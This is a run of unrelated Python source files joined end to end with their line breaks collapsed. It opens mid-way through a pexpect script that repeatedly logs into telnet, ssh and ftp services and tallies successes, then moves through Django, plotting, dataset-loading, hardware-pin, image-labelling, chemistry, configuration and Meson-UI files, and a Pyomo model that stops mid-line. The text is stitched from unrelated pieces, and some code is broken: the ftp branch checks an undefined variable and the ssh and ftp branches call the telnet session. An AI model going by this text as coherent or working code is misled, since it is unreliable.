"(?i)Unknown host", pexpect.EOF, pexpect.TIMEOUT]) if ( mylist == 0 ): # 匹配'login'字符串成功,输入用户名. telnet.sendline(LoginName) # 期待 "[pP]assword" 出现. mylist2 = telnet.expect(["[pP]assword", pexpect.EOF, pexpect.TIMEOUT]) # 匹配 "[pP]assword" 字符串成功,输入密码. telnet.sendline(LoginPassword) # 期待提示符出现. telnet.expect(LoginPrompt) if (mylist2 == 0): # 匹配提示符成功,输入执行命令 '\n' telnet.sendline('\n') # 期待提示符出现. telnet.expect(LoginPrompt) tel_list.append(1) if Debug == 0: pass else: print 'Congratulations! telnet login correct!' if Manual == 1: telnet.interact() else: if TimeInterval == 0: time.sleep(10) else: time.sleep(RepeatTimes*TimeInterval+5) # 匹配到了 pexpect.EOF 或 pexpect.TIMEOUT,表示超时或者 EOF,程序打印提示信息并退出. elif (mylist2 == 1): tel_list.append(2) if Debug == 0: pass else: print "Telnet login failed, due to EOF!!!" elif(mylist2 == 2): tel_list.append(3) if Debug == 0: pass else: print "Telnet login failed, due to TIMEOUT!!!" else: tel_list.append(0) telnet.close(force=True) # 匹配到了 pexpect.EOF 或 pexpect.TIMEOUT,表示超时或者 EOF,程序打印提示信息并退出. elif (mylist == 1): tel_list.append(0) if Debug == 0: pass else: print "Telnet login failed, due to Unknown host!!!" elif(mylist == 2): tel_list.append(2) if Debug == 0: pass else: print "Telnet login failed, due to EOF!!!" elif(mylist == 3): tel_list.append(3) if Debug == 0: pass else: print "Telnet login failed, due to TIMEOUT!!!" else: tel_list.append(0) if Debug == 0: pass else: print "Telnet login failed, due to Others!!!" telnet.close() def ssh_cmd(IpAddress,LoginPassword,ssh_list): cmd = 'ssh '+LoginName+'@' + IpAddress+' -p '+SshPort # 为 ssh 生成 spawn 类子程序 ssh = pexpect.spawn(cmd) # 期待'passwd'字符串出现,从而接下来可以输入密码 mylist = ssh.expect(['password:','Are you sure you want to continue connecting (yes/no)?', pexpect.EOF,pexpect.TIMEOUT],timeout=5) if mylist == 0 : ssh.sendline(LoginPassword) ssh_list.append(1) if Debug == 0: pass else: print 'Congratulations! ssh login correct!' if Manual == 1: telnet.interact() else: if TimeInterval == 0: time.sleep(10) else: time.sleep(RepeatTimes*TimeInterval+5) elif mylist == 1: ssh.sendline('yes\n') ssh.expect('password: ') ssh.sendline(LoginPassword) ssh.sendline('\n') ssh_list.append(1) elif mylist == 2: ssh_list.append(2) if Debug == 0: pass else: print "Ssh login failed, due to EOF!!!" elif mylist == 3: ssh_list.append(3) if Debug == 0: pass else: print "Ssh login failed, due to TIMEOUT!!!" ssh.close() def ftp_cmd(IpAddress,LoginPassword,ftp_list): # 拼凑 ftp 命令 cmd = 'ftp ' + IpAddress # 利用 ftp 命令作为 spawn 类构造函数的参数,生成一个 spawn 类的对象 ftp = pexpect.spawn(cmd) # 期望具有提示输入用户名的字符出现 mylist = ftp.expect(["(?i)name", "(?i)Unknown host", pexpect.EOF, pexpect.TIMEOUT]) # 匹配到了 "(?i)name",表明接下来要输入用户名 if ( mylist == 0 ): # 发送登录用户名 + 换行符给子程序. ftp.sendline(LoginName) # 期望 "(?i)password" 具有提示输入密码的字符出现. mylist = ftp.expect(["(?i)password", pexpect.EOF, pexpect.TIMEOUT]) ftp.sendline(LoginPassword) # 期望登录成功后,提示符 "ftp>" 字符出现. mylist = ftp.expect( ['ftp>', 'Login incorrect', 'Service not available', pexpect.EOF, pexpect.TIMEOUT]) # 匹配到了 'ftp>',登录成功. if (mylist == 0): ftp_list.append(1) if Debug == 0: pass else: print 'Congratulations! ftp login correct!' if Manual == 1: telnet.interact() else: if TimeInterval == 0: time.sleep(10) else: time.sleep(RepeatTimes*TimeInterval+5) elif (mylist2 == 1): ftp_list.append(2) if Debug == 0: pass else: print "Telnet login failed, due to EOF!!!" elif(mylist2 == 2): ftp_list.append(3) if Debug == 0: pass else: print "Telnet login failed, due to TIMEOUT!!!" else: ftp_list.append(0) # 匹配到了 pexpect.EOF 或 pexpect.TIMEOUT,表示超时或者 EOF,程序打印提示信息并退出 elif mylist == 3 : ftp_list.append(2) if Debug == 0: pass else: print "ftp login failed, due to EOF!!!" elif mylist == 4: ftp_list.append(3) if Debug == 0: pass else: print "ftp login failed, due to TIMEOUT!!!" else: ftp_list.append(0) if Debug == 0: pass else: print "ftp login failed, due to Others" ftp.close() if __name__ == '__main__': try: tel_list = [0] ssh_list = [0] ftp_list = [0] main(RepeatTimes) if TestTelnet is 1: print '=============================' print '====== Telnet Resoult ======' print 'Success times : ',tel_list.count(1) print 'Timeout times : ',tel_list.count(3) print 'EOF times : ',tel_list.count(2) print '=============================' if TestSsh is 1: print '=============================' print '======== Ssh Resoult ========' print 'Success times : ',ssh_list.count(1) print 'Timeout times : ',ssh_list.count(3) print 'EOF times : ',ssh_list.count(2) print '=============================' if TestFtp is 1: print '=============================' print '======== Ftp Resoult ========' print 'Success times : ',ftp_list.count(1) print 'Timeout times : ',ftp_list.count(3) print 'EOF times : ',ftp_list.count(2) print '=============================' except Exception, e: print str(e) os._exit(1) from django.contrib import admin from .models import Household from .models import MetertypeHousehold from .models import UserHousehold admin.site.register(Household) admin.site.register(MetertypeHousehold) admin.site.register(UserHousehold) """ Mutatio SD-daten Auswertung by """ import matplotlib.pyplot as plt import matplotlib.dates as md import numpy as np import datetime as dt import time import matplotlib.patches as patches import matplotlib.path as path #simply plot a file, no adjustments: #plt.plotfile('/Users/daedae/PycharmProjects/test/netzsinus/2016067.txt', delimiter='\t', cols=(0, 1), # names=('Frequenz', 'Zeit'), marker='o') #plt.show() #plot a file with possibility to reformat the data #enter path to your file here with open('/Users/daedae/PycharmProjects/test/netzsinus/2016059_eu.txt') as f: data = f.read().splitlines() timestamps = [row.split('\t')[0] for row in data] timestamps = np.array(timestamps).astype(np.float) #make floats from strings frequency = [row.split('\t')[1] for row in data] frequency = np.array(frequency).astype(np.float) #make floats from strings quality = [row.split('\t')[2] for row in data] quality = np.array(quality).astype(np.int) #make integers from strings datetimestamps = [dt.datetime.fromtimestamp(idx) for idx in timestamps] #Mutatio code bug (is fixed now): overflows erkennen und bereinigen for i in range(1, len(frequency)): if(frequency[i]>50.2 and frequency[i-1] < 49.8): #underflow value while(frequency[i] > 50.0): frequency[i] = frequency[i]-0.65536 i += 1 if(frequency[i]<49.8 and frequency[i-1] > 50.2): #overflow value while(frequency[i] < 50.0): frequency[i] = frequency[i]+0.65536 i += 1 fig = plt.figure(1) ax = fig.add_subplot(111) ax.set_title("Grid Frequency") #ax1.set_xlabel('Zeit') ax.set_ylabel('Frequency') plt.subplots_adjust(bottom=0.3) plt.xticks( rotation=25 ) ax=plt.gca() xfmt = md.DateFormatter('%Y-%m-%d %H:%M:%S') ax.xaxis.set_major_formatter(xfmt) ax.plot(datetimestamps,frequency, c='b', label='Frequency') #leg = ax1.legend() #show the legend label plt.show() #histogramm und fourier analyse: fig = plt.figure(2) plt.subplots_adjust(hspace=0.4) ax = fig.add_subplot(211) #plt.subplots() # histogram our data with numpy n, bins = np.histogram(frequency, 1000) # get the corners of the rectangles for the histogram left = np.array(bins[:-1]) right = np.array(bins[1:]) bottom = np.zeros(len(left)) top = bottom + n ax.axes.get_yaxis().set_visible(False) #disable drawing the y axis # we need a (numrects x numsides x 2) numpy array for the path helper # function to build a compound path XY = np.array([[left, left, right, right], [bottom, top, top, bottom]]).T # get the Path object barpath = path.Path.make_compound_path_from_polys(XY) # make a patch out of it patch = patches.PathPatch( barpath, facecolor='gold', edgecolor='gold', alpha=0.8) ax.add_patch(patch) # update the view limits ax.set_xlim(left[0], right[-1]) ax.set_ylim(bottom.min(), top.max()+top.max()*0.05) ax.set_title("Frequency Distribution") #plt.show() #fourier analysis #the problem is uneven spaced time data, lets make it one value per second data using cubic interpolation from scipy.interpolate import interp1d from scipy.fftpack import fft frequency_interp = interp1d(timestamps, frequency) #, kind='cubic' timestamps_interp = np.linspace(timestamps[0], timestamps[-1], int(timestamps[-1] - timestamps[0]), endpoint=True) #now we have interpolated data, do the FFT # Number of samplepoints N = int(timestamps[-1] - timestamps[0]) # sample spacing T = 1.0 #1Hz or 1 sample per second x = np.linspace(0.0, N*T, N) yf = fft(frequency_interp(timestamps_interp)) xf = np.linspace(0.0, T,N,endpoint=True) #xf = np.linspace(timestamps[0], timestamps[-1], int(timestamps[-1] - timestamps[0]), endpoint=True) ax = fig.add_subplot(212) ax.set_title("Fourier analysis of Frequency") ax.set_xlabel('Oscillations in the Frequency in [Hz]') #ax.set_yscale('log') ax.axes.get_yaxis().set_visible(False) #disable drawing the y axis ax.axes.get_yaxis().set_visible(True) #disable drawing the y axis plt.plot(xf[N/15:N/2],np.abs(yf[N/15:N/2]), c='r') plt.grid() plt.show() import pandas as pd def tokenize_array(supports): tokens = [] for support in supports: tokens.extend(tokenizer.tokenize(support)) tokens.append(tokenizer.sep_token) return tokens def load_summaries(): summaries = pd.read_csv('narrativeqa/summaries.csv', sep=',') train = summaries.loc[summaries['set'] == 'train'] test = summaries[summaries['set'] == 'test'] return train[['document_id', 'summary']], test[['document_id', 'summary']] def load_train(): """ Load data in from narrativeqa. """ qa = pd.read_csv('narrativeqa/qaps.csv', sep=',') train = qa.loc[qa['set'] == 'train'] test = qa[qa['set'] == 'test'] train_x = train[['document_id', 'question']] train_y = train[['answer1', 'answer2']] test_x = test[['document_id', 'question']] test_y = test[['answer1', 'answer2']] return train_x, train_y, test_x, test_y twa127/Adafruit_Blinkasrc/adafruit_blinka/board/qtpy_u2if.py100-1000 """ Pin definitions for the QT Py RP2040 with u2if firmware. Adafruit CircuitPython 6.2.0 on 2021-04-05; Adafruit QTPy RP2040 with rp2040 >>> import board >>> board. A0 A1 A2 A3 BUTTON D0 D1 D10 D2 D3 D4 D5 D6 D7 D8 D9 I2C MISO MOSI NEOPIXEL NEOPIXEL_POWER RX SCK SCL SCL1 SDA SDA1 SPI TX UART """ from adafruit_blinka.microcontroller.rp2040_u2if import pin D0 = pin.GP29 D1 = pin.GP28 D2 = pin.GP27 D3 = pin.GP26 D4 = pin.GP24 D5 = pin.GP25 D6 = pin.GP20 D7 = pin.GP5 D8 = pin.GP6 D9 = pin.GP4 D10 = pin.GP3 # A0 = pin.GP29 # not currently supported in firmware A1 = pin.GP28 A2 = pin.GP27 A3 = pin.GP26 SCL = pin.GP25 SDA = pin.GP24 SCL1 = pin.GP23 SDA1 = pin.GP22 SCLK = SCK = pin.GP6 MOSI = pin.GP3 MISO = pin.GP4 NEOPIXEL = pin.GP12 NEOPIXEL_POWER = pin.GP11 BUTTON = pin.GP21 # access u2if via pin instance to open for specifc VID/PID # pylint:disable = protected-access pin.GP0._u2if_open_hid(0x239A, 0x00F7) 100-1000 import numbers import numpy as np from . import color as color_module from . import draw as draw_module def label_colormap(n_label=256, value=None): """Label colormap. Parameters ---------- n_labels: int Number of labels (default: 256). value: float or int Value scale or value of label color in HSV space. Returns ------- cmap: numpy.ndarray, (N, 3), numpy.uint8 Label id to colormap. """ def bitget(byteval, idx): shape = byteval.shape + (8,) return np.unpackbits(byteval).reshape(shape)[..., -1 - idx] i = np.arange(n_label, dtype=np.uint8) r = np.full_like(i, 0) g = np.full_like(i, 0) b = np.full_like(i, 0) i = np.repeat(i[:, None], 8, axis=1) i = np.right_shift(i, np.arange(0, 24, 3)).astype(np.uint8) j = np.arange(8)[::-1] r = np.bitwise_or.reduce(np.left_shift(bitget(i, 0), j), axis=1) g = np.bitwise_or.reduce(np.left_shift(bitget(i, 1), j), axis=1) b = np.bitwise_or.reduce(np.left_shift(bitget(i, 2), j), axis=1) cmap = np.stack((r, g, b), axis=1).astype(np.uint8) if value is not None: hsv = color_module.rgb2hsv(cmap.reshape(1, -1, 3)) if isinstance(value, float): hsv[:, 1:, 2] = hsv[:, 1:, 2].astype(float) * value else: assert isinstance(value, int) hsv[:, 1:, 2] = value cmap = color_module.hsv2rgb(hsv).reshape(-1, 3) return cmap def label2rgb( label, image=None, alpha=0.5, label_names=None, font_size=30, thresh_suppress=0, colormap=None, loc="rb", font_path=None, ): """Convert label to rgb. Parameters ---------- label: numpy.ndarray, (H, W), int Label image. image: numpy.ndarray, (H, W, 3), numpy.uint8 RGB image. alpha: float, or list or dict of float Alpha of RGB (default: 0.5). If given as a list or dict, it is treated as alpha for each class according to the index or key. label_names: list or dict of string Label id to label name. font_size: int Font size (default: 30). thresh_suppress: float Threshold of label ratio in the label image. colormap: numpy.ndarray, (M, 3), numpy.uint8 Label id to color. By default, :func:`~imgviz.label_colormap` is used. loc: string Location of legend (default: 'rb'). 'centroid', 'lt' and 'rb' are supported. font_path: str Font path. Returns ------- res: numpy.ndarray, (H, W, 3), numpy.uint8 Visualized image. """ if colormap is None: colormap = label_colormap() res = colormap[label] random_state = np.random.RandomState(seed=1234) mask_unlabeled = label < 0 res[mask_unlabeled] = random_state.rand(*(mask_unlabeled.sum(), 3)) * 255 unique_labels = np.unique(label) max_label_id = unique_labels[-1] if isinstance(alpha, numbers.Number): alpha = np.array([alpha for _ in range(max_label_id + 1)]) elif isinstance(alpha, dict): alpha = np.array([alpha.get(l, 0.5) for l in range(max_label_id + 1)]) else: alpha = np.asarray(alpha) assert alpha.ndim == 1 assert ((0 <= alpha) & (alpha <= 1)).all() alpha = alpha[label][:, :, None] if image is not None: if image.ndim == 2: image = color_module.gray2rgb(image) res = (1 - alpha) * image.astype(float) + alpha * res.astype(float) res = np.clip(res.round(), 0, 255).astype(np.uint8) if label_names is None: return res unique_labels = unique_labels[unique_labels != -1] if isinstance(label_names, dict): unique_labels = [l for l in unique_labels if label_names.get(l)] else: unique_labels = [l for l in unique_labels if label_names[l]] if len(unique_labels) == 0: return res if loc == "centroid": for label_i in unique_labels: mask = label == label_i if 1.0 * mask.sum() / mask.size < thresh_suppress: continue y, x = np.array(_center_of_mass(mask), dtype=int) if label[y, x] != label_i: Y, X = np.where(mask) point_index = np.random.randint(0, len(Y)) y, x = Y[point_index], X[point_index] text = label_names[label_i] height, width = draw_module.text_size( text, size=font_size, font_path=font_path ) color = color_module.get_fg_color(res[y, x]) res = draw_module.text( res, yx=(y - height // 2, x - width // 2), text=text, color=color, size=font_size, font_path=font_path, ) elif loc in ["rb", "lt"]: text_sizes = np.array( [ draw_module.text_size( label_names[l], font_size, font_path=font_path ) for l in unique_labels ] ) text_height, text_width = text_sizes.max(axis=0) legend_height = text_height * len(unique_labels) + 5 legend_width = text_width + 20 + (text_height - 10) height, width = label.shape[:2] legend = np.zeros((height, width, 3), dtype=np.uint8) if loc == "rb": aabb2 = np.array([height - 5, width - 5], dtype=float) aabb1 = aabb2 - (legend_height, legend_width) elif loc == "lt": aabb1 = np.array([5, 5], dtype=float) aabb2 = aabb1 + (legend_height, legend_width) else: raise ValueError("unexpected loc: {}".format(loc)) legend = draw_module.rectangle( legend, aabb1, aabb2, fill=(255, 255, 255) ) alpha = 0.5 y1, x1 = aabb1.round().astype(int) y2, x2 = aabb2.round().astype(int) res[y1:y2, x1:x2] = ( alpha * res[y1:y2, x1:x2] + alpha * legend[y1:y2, x1:x2] ) for i, l in enumerate(unique_labels): box_aabb1 = aabb1 + (i * text_height + 5, 5) box_aabb2 = box_aabb1 + (text_height - 10, text_height - 10) res = draw_module.rectangle( res, aabb1=box_aabb1, aabb2=box_aabb2, fill=colormap[l] ) res = draw_module.text( res, yx=aabb1 + (i * text_height, 10 + (text_height - 10)), text=label_names[l], size=font_size, font_path=font_path, ) else: raise ValueError("unsupported loc: {}".format(loc)) return res def _center_of_mass(mask): assert mask.ndim == 2 and mask.dtype == bool mask = 1.0 * mask / mask.sum() dx = np.sum(mask, 0) dy = np.sum(mask, 1) cx = np.sum(dx * np.arange(mask.shape[1])) cy = np.sum(dy * np.arange(mask.shape[0])) return cy, cx from rdkit import Chem from rdkit.Chem import AllChem from rdkit.Chem import DataStructs import numpy as np classes = {'(A) low':0, '(B) medium':1, '(C) high':2 } rclasses = {0:'(A) low', 1:'(B) medium', 2: '(C) high'} def mol2fp(mol): fp = AllChem.GetMorganFingerprintAsBitVect(mol, 2) arr = np.zeros((0,)) DataStructs.ConvertToNumpyArray(fp, arr) return arr def make_data(sdf): mols = [m for m in Chem.SDMolSupplier(sdf) if m !=None] X = np.array([mol2fp(m) for m in mols]) Y = [classes[m.GetProp('SOL_classification')] for m in mols] Y = np.array(Y) return (X, Y) jernejule/iMaps """Base validation.""" import datetime import os VALID_BED_EXTENSIONS = ( ".bed", ".bed.gz", ) VALID_BAM_EXTENSIONS = ( ".bam", ".sam", ) def validate_bed_file(fname, check_exist=False): """Validate BED file.""" if not fname.endswith(VALID_BED_EXTENSIONS): raise ValueError(f"Bed file {fname} should have a valid bed extension.") if check_exist and not os.path.isfile(fname): raise ValueError(f"Bed file {fname} does not exist.") def validate_bam_file(fname, check_exist=False): """Validate BAM file.""" if not fname.endswith(VALID_BAM_EXTENSIONS): raise ValueError(f"Bam file {fname} should have a valid bam extension.") if check_exist and not os.path.isfile(fname): raise ValueError(f"Bam file {fname} does not exist.") def validate_string(value, choices=None, allow_empty=False): """Validate string.""" if not value and allow_empty: return if not isinstance(value, str): raise ValueError(f"Value {value} should be a string.") if choices and value not in choices: choices_ = ", ".join(choices) raise ValueError(f"Value {value} should be one of {choices_}.") def validate_integer(value): """Validate integer.""" if not isinstance(value, int): raise ValueError(f"Value {value} should be an integer.") def validate_date(value, allow_empty=False): """Validate date format.""" if not value and allow_empty: return try: datetime.datetime.strptime(value, "%Y-%m-%d") except ValueError: raise ValueError(f"Incorrect date format ({value}), should be YYYY-MM-DD.") from django.urls import path, include from rest_framework.routers import DefaultRouter from post import views router = DefaultRouter() router.register('tags', views.TagViewSet) router.register('posts', views.PostViewSet) router.register('comments', views.CommentViewSet) app_name = 'post' urlpatterns = [ path('', include(router.urls)) ] #!/usr/bin/env python # -*- coding: utf-8 -*- # from __future__ import unicode_literals AUTHOR = u'tutysara' SITENAME = u"tutysara's space" #SITEURL = 'http://localhost:8080' SITEURL = 'http://www.tutysara.net' # Uncomment following line if you want document-relative URLs when developing #RELATIVE_URLS = True TIMEZONE = 'Asia/Calcutta' DEFAULT_LANG = u'en' # Feed generation is usually not desired when developing FEED_ALL_ATOM = 'feeds/all.rss.xml' CATEGORY_FEED_ATOM = 'feeds/%s.rss.xml' TRANSLATION_FEED_ATOM = None # Blogroll #LINKS = (('Pelican', 'http://getpelican.com/'), # ('Python.org', 'http://python.org/'), # ('Jinja2', 'http://jinja.pocoo.org/'), # ('You can modify those links in your config file', '#'),) # Social widget SOCIAL = (('@tutysara', 'http://twitter.com/tutysara', 'icon-twitter'), ('github', 'http://github.com/tutysara', 'icon-github'), ('+tutysara', 'https://plus.google.com/113376160578552687607/posts', 'icon-google-plus'),) SOCIAL_OLD = (('twitter', 'http://twitter.com/tutysara'), ('github', 'http://github.com/tutysara'), ('google-plus', 'https://plus.google.com/113376160578552687607/posts'),) DEFAULT_PAGINATION = 3 # boot strap theme specific TAG_CLOUD_STEPS = 4 TAG_CLOUD_MAX_ITEMS = 10 DISPLAY_CATEGORIES_ON_MENU = False MARKUP = ('markdown', 'md' , 'htm', 'html',) DEFAULT_CATEGORY = ('Articles') # my customizations COPY_RIGHT_STRING = "Copyright 2013, tutysara Powered by Pelican and modified Bootstrap 3 theme" # discus site name DISQUS_SITENAME = 'tutysarablog' # google analytics GOOGLE_ANALYTICS = 'UA-34510369-1' # Filename Metadata: YYYY-MM-DD-the-rest-before-the-dot-is-the-slug.md, for example FILENAME_METADATA = '(?P\d{4}-\d{2}-\d{2})-(?P.*)' ARTICLE_URL = 'posts/{date:%Y}/{date:%m}/{date:%d}/{slug}/' ARTICLE_SAVE_AS = 'posts/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html' PAGE_URL ='pages/{slug}/index.html' PAGE_SAVE_AS = 'pages/{slug}/index.html' # Copy some files over... FILES_TO_COPY = (("extras/favicon.ico", "favicon.ico"), ("extras/CNAME", "CNAME"),) # Theme support THEME = "/Users/tutysara/src/myprojects/pelican-bootstrap3-tutysara" ADDTHIS_PROFILE = "ra-52530224602b734f" BOOTSTRAP_THEME = "journal" USE_OPEN_GRAPH= False michaelbadcrumble/meson-ui10-100 #!/usr/bin/env python3 # # author : .   # contact: > # license: Apache 2.0 :http://www.apache.org/licenses/LICENSE-2.0 # # copyright 2020 The Meson-UI development team # from PyQt5.QtCore import pyqtSlot from PyQt5.QtWidgets import QDialog from ..mesonuilib.coredata import MesonUiInstallCache from ..mesonuilib.coredata import default_install from ..models.appmodel import MainModel from ..mesonuitheme import MesonUiTheme import typing as T from ..ui.activity_install import Ui_Activity_Dist_Dialog class InstallActivity(QDialog, Ui_Activity_Dist_Dialog): def __init__(self, model: MainModel = None): super(self.__class__, self).__init__() self.setupUi(self) self.setStyleSheet(MesonUiTheme().set_theme()) self.setFixedSize(740, 421) self._model: MainModel = model self.on_activity_start() self.show() @pyqtSlot() def on_activity_start(self): ''' This method is the starting point of this Meson-UI and is called after the app is initlzied. ''' self._cache: MesonUiInstallCache = MesonUiInstallCache() self.control_push_do_update.clicked.connect(lambda: self.exec_do_update()) self.control_push_do_install.clicked.connect(lambda: self.exec_do_dist()) self.control_push_no_install.clicked.connect(lambda: self.exec_no_dist()) self._cache.init_cache() self._cache_default() @pyqtSlot() def exec_do_dist(self): ''' this method will perform the "meson install" action and pass all options with the set whatever the user would like ''' meson_args: list = list() self._cache_update() self._cache_parser(meson_args=meson_args) self._cache_sender(meson_args=meson_args) self.close() @pyqtSlot() def exec_do_update(self): ''' this method just calls _cache_update to refresh current settings values in configure cache object ''' self._cache_update() @pyqtSlot() def exec_no_dist(self): self.close() def _cache_sender(self, meson_args: list) -> None: ''' this method will send the set to are Meson wrapper object ''' self._meson.install(meson_args) def _cache_parser(self, meson_args: list) -> None: ''' this method will parse the given cache configuration via extract from cache objects internal set value and add to local 'meson_args' setup ''' # # here we need to always get a fresh copy of # the current configuration data from are core # cache data so we don’t pass old data. cache: T.Dict = self._cache.get_cache() # # here we add Meson install config values from # are cache object. for conf in cache: meson_args.extend([f'{conf}={cache[conf]}']) def _cache_update(self) -> None: ''' this method will update all supported Meson build options to whatever the user sets the values to. ''' self._cache.configure('formats', self.combo_formats.currentText()) self._cache.configure('include-subprojects', self.combo_include_subprojects.currentText()) self._cache.configure('quiet', self.combo_include_subprojects.currentText()) def _cache_default(self) -> None: ''' here we set all supported options to the first value from are default cache settings dict objects. ''' self.combo_no_rebuild.addItems(default_install['on-rebuild']) self.combo_only_changed.addItems(default_install['only-changed']) self.combo_quiet.addItems(default_install['quiet']) # Generated by Django 3.1.6 on 2021-08-26 19:52 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('jobs', '0017_merge_20210826_1952'), ] operations = [ migrations.DeleteModel( name='HistoricalJob', ), ] projdir/app/migrations/0020_auto_20160501_2317.py # -*- coding: utf-8 -*- # Generated by Django 1.9.4 on 2016-05-01 17:47 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('app', '0019_pinghostprojectmodel'), ] operations = [ migrations.RenameField( model_name='pinghostprojectmodel', old_name='hosted_event', new_name='hosted_project', ), ] import pandas as pd from sklearn.preprocessing import LabelEncoder from sklearn.model_selection import cross_val_score from sklearn.linear_model import LinearRegression from sklearn.ensemble import RandomForestRegressor from sklearn.ensemble import GradientBoostingRegressor #from sklearn.preprocessing import LabelEncoder ## Loading data and preprocessing data = pd.read_csv('../datasets/merged.csv') train_data=data.iloc[:,0:10] data["Individual_Rate"] = (data["Individual_Rate"]-data["Individual_Rate"].min())/(data["Individual_Rate"].max()-data["Individual_Rate"].min()) Y=data.iloc[:,10] #test_data = pd.read_csv('../datasets/merged.csv') features=['Ins_Age','BMI','Individual_Rate'] ##Linear Regression LinReg_model = LinearRegression() LinReg_model.fit(train_data[features], Y) linReg_score = cross_val_score(LinReg_model, train_data[features], Y, cv=10,scoring='r2').mean() print("R2 score using Linear Regression is ",linReg_score*100) print("Linear reg coef",LinReg_model.coef_) ##Random Forest Regressor ## ##RanForest_model = RandomForestRegressor( random_state=0) ##RanForest_model.fit(train_data[features], Y) ##ranForest_score = cross_val_score(RanForest_model, train_data[features], Y, cv=10,scoring='r2').mean() ##print("R2 score using Random Forest Regression is ",ranForest_score*100) ##Gradient Boosting Regressor GradBoost_model = GradientBoostingRegressor(max_depth=3, random_state=0,learning_rate=0.1,n_estimators=200) GradBoost_model.fit(train_data[features], Y) GradBoost_model.apply(train_data[features]) gradBoost_score = cross_val_score(GradBoost_model, train_data[features], Y, cv=10,scoring='r2').mean() print("Feature Importance ",GradBoost_model.feature_importances_) print("R2 score using Gradient Boosting Regressor is ",gradBoost_score*100) tests/examples/minlplib/graphpart_3g-0333-0333.py # MINLP written by GAMS Convert at 04/21/18 13:52:22 # # Equation counts # Total E G L N X C B # 28 28 0 0 0 0 0 0 # # Variable counts # x b i s1s s2s sc si # Total cont binary integer sos1 sos2 scont sint # 82 1 81 0 0 0 0 0 # FX 0 0 0 0 0 0 0 0 # # Nonzero counts # Total const NL DLL # 163 82 81 0 # # Reformulation has removed 1 variable and 1 equation from pyomo.environ import * model = m = ConcreteModel() m.b1 = Var(within=Binary,bounds=(0,1),initialize=0) m.b2 = Var(within=Binary,bounds=(0,1),initialize=0) m.b3 = Var(within=Binary,bounds=(0,1),initialize=0) m.b4 = Var(within=Binary,bounds=(0,1),initialize=0) m.b5 = Var(within=Binary,bounds=(0,1),initialize=0) m.b6 = Var(within=Binary,bounds=(0,1),initialize=0) m.b7 = Var(within=Binary,bounds=(0,1),initialize=0) m.b8 = Var(within=Binary,bounds=(0,1),initialize=0) m.b9 = Var(within=Binary,bounds=(0,1),initialize=0) m.b10 = Var(within=Binary,bounds=(0,1),initialize=0) m.b11 = Var(within=Binary,bounds=(0,1),initialize=0) m.b12 = Var(within=Binary,bounds=(0,1),initialize=0) m.b13 = Var(within=Binary,bounds=(0,1),initialize=0) m.b14 = Var(within=Binary,bounds=(0,1),initialize=0) m.b15 = Var(within=Binary,bounds=(0,1),initialize=0) m.b16 = Var(within=Binary,bounds=(0,1),initialize=0) m.b17 = Var(within=Binary,bounds=(0,1),initialize=0) m.b18 = Var(within=Binary,bounds=(0,1),initialize=0) m.b19 = Var(within=Binary,bounds=(0,1),initialize=0) m.b20 = Var(within=Binary,bounds=(0,1),initialize=0) m.b21 = Var(within=Binary,bounds=(0,1),initialize=0) m.b22 = Var(within=Binary,bounds=(0,1),initialize=0) m.b23 = Var(within=Binary,bounds=(0,1),initialize=0) m.b24 = Var(within=Binary,bounds=(0,1),initialize=0) m.b25 = Var(within=Binary,bounds=(0,1),initialize=0) m.b26 = Var(within=Binary,bounds=(0,1),initialize=0) m.b27 = Var(within=Binary,bounds=(0,1),initialize=0) m.b28 = Var(within=Binary,bounds=(0,1),initialize=0) m.b29 = Var(within=Binary,bounds=(0,1),initialize=0) m.b30 = Var(within=Binary,bounds=(0,1),initialize=0) m.b31 = Var(within=Binary,bounds=(0,1),initialize=0) m.b32 = Var(within=Binary,bounds=(0,1),initialize=0) m.b33 = Var(within=Binary,bounds=(0,1),initialize=0) m.b34 = Var(within=Binary,bounds=(0,1),initialize=0) m.b35 = Var(within=Binary,bounds=(0,1),initialize=0) m.b36 = Var(within=Binary,bounds=(0,1),initialize=0) m.b37 = Var(within=Binary,bounds=(0,1),initialize=0) m.b38 = Var(within=Binary,bounds=(0,1),initialize=0) m.b39 = Var(within=Binary,bounds=(0,1),initialize=0) m.b40 = Var(within=Binary,bounds=(0,1),initialize=0) m.b41 = Var(within=Binary,bounds=(0,1),initialize=0) m.b42 = Var(within=Binary,bounds=(0,1),initialize=0) m.b43 = Var(within=Binary,bounds=(0,1),initialize=0) m.b44 = Var(within=Binary,bounds=(0,1),initialize=0) m.b45 = Var(within=Binary,bounds=(0,1),initialize=0) m.b46 = Var(within=Binary,bounds=(0,1),initialize=0) m.b47 = Var(within=Binary,bounds=(0,1),initialize=0) m.b48 = Var(within=Binary,bounds=(0,1),initialize=0) m.b49 = Var(within=Binary,bounds=(0,1),initialize=0) m.b50 = Var(within=Binary,bounds=(0,1),initialize=0) m.b51 = Var(within=Binary,bounds=(0,1),initialize=0) m.b52 = Var(within=Binary,bounds=(0,1),initialize=0) m.b53 = Var(within=Binary,bounds=(0,1),initialize=0) m.b54 = Var(within=Binary,bounds=(0,1),initialize=0) m.b55 = Var(within=Binary,bounds=(0,1),initialize=0) m.b56 = Var(within=Binary,bounds=(0,1),initialize=0) m.b57 = Var(within=Binary,bounds=(0,1),initialize=0) m.b58 = Var(within=Binary,bounds=(0,1),initialize=0) m.b59 = Var(within=Binary,bounds=(0,1),initialize=0) m.b60 = Var(within=Binary,bounds=(0,1),initialize=0) m.b61 = Var(within=Binary,bounds=(0,1),initialize=0) m.b62 = Var(within=Binary,bounds=(0,1),initialize=0) m.b63 = Var(within=Binary,bounds=(0,1),initialize=0) m.b64 = Var(within=Binary,bounds=(0,1),initialize=0) m.b65 = Var(within=Binary,bounds=(0,1),initialize=0) m.b66 = Var(within=Binary,bounds=(0,1),initialize=0) m.b67 = Var(within=Binary,bounds=(0,1),initialize=0) m.b68 = Var(within=Binary,bounds=(0,1),initialize=0) m.b69 = Var(within=Binary,bounds=(0,1),initialize=0) m.b70 = Var(within=Binary,bounds=(0,1),initialize=0) m.b71 = Var(within=Binary,bounds=(0,1),initialize=0) m.b72 = Var(within=Binary,bounds=(0,1),initialize=0) m.b73 = Var(within=Binary,bounds=(0,1),initialize=0) m.b74 = Var(within=Binary,bounds=(0,1),initialize=0) m.b75 = Var(within=Binary,bounds=(0,1),initialize=0) m.b76 = Var(within=Binary,bounds=(0,1),initialize=0) m.b77 = Var(within=Binary,bounds=(0,1),initialize=0) m.b78 = 